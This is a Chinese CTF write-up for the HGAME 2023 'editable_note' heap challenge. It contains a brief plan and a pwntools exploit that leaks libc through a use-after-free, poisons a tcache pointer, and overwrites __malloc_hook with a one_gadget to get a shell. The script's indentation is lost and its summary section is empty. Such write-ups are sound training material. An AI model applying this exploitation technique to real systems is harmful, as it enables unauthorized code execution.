Problem: [HGAME 2023 week2]editable_note
思路
创8个 0x80 chunk
然后free 需要倒着free 正着free会被top_chunk合并 然后就到unsortbin UAF直接打印泄露LIBC
拿到libc直接改其中一个tcache的fd 申请两次拿到__malloc_hook控制权 直接往上写onegadget
getshell!
EXP
from pwn import *
context.log_level = 'debug'
p = remote("node5.anna.nssctf.cn",22380)
#p = process("./vuln")
e = ELF('./vuln')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so')
def new(idx,size):
p.sendlineafter(b'>',str(1))
p.sendlineafter(b'Index:',str(idx))
p.sendlineafter(b'Size:',str(size))
def edit(idx,content):
p.sendlineafter(b'>',str(3))
p.sendlineafter(b'Index:',str(idx))
p.sendlineafter(b'Content: ',content)
def show(idx):
p.sendlineafter(b'>',str(4))
p.sendlineafter(b'Index:',str(idx))
def free(idx):
p.sendlineafter(b'>',str(2))
p.sendlineafter(b'Index:',str(idx))
for i in range(8):
new(i,0x80)
for i in range(8):
free(7-i)
show(0)
libc_fake_chunk = u64(p.recvuntil(b"1. Add note",drop=True)[1:7].ljust(8,b'\x00')) - 96 - 0x10
log.info("leak libc_fake_chunk=>"+hex(libc_fake_chunk))
edit(1,p64(libc_fake_chunk))
new(9,0x80)
new(10,0x80)
og = [0xe3afe,0xe3b01,0xe3b04]
edit(10,p64(libc_fake_chunk - libc.sym["__malloc_hook"]+ og[1]))
new(11,0x50)
#attach(p)p.interactive()
总结
- 对该题的考点总结